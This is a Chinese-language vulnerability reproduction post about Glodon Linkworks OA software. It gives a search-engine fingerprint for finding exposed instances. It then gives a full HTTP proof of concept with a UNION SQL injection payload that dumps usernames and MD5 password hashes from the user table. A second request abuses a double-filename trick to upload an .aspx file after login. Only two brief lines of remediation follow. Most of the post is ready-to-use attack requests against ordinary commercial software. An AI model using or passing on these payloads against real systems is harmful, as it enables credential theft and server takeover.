广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)

0x01 产品简介

    广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。

0x02 漏洞概述

   由于 广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。

0x03 复现环境

鹰图指纹:web.body="/Services/Identification/Server/"

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)_第1张图片

0x04 漏洞复现

访问以下url验证漏洞是否存在

http://your-ip/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)_第2张图片 出现以上情况则存在漏洞

POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

PS:直接查询用户名密码 

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)_第3张图片 解密

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)_第4张图片

尝试登录

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)_第5张图片

后台文件上传

PoC

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 登录后的

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)_第6张图片

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)_第7张图片

 0x05 修复建议

 限制访问来源地址,如非必要,不要将系统开放在互联网上。 

  尽快打补丁!

你可能感兴趣的:(漏洞复现,安全,web安全)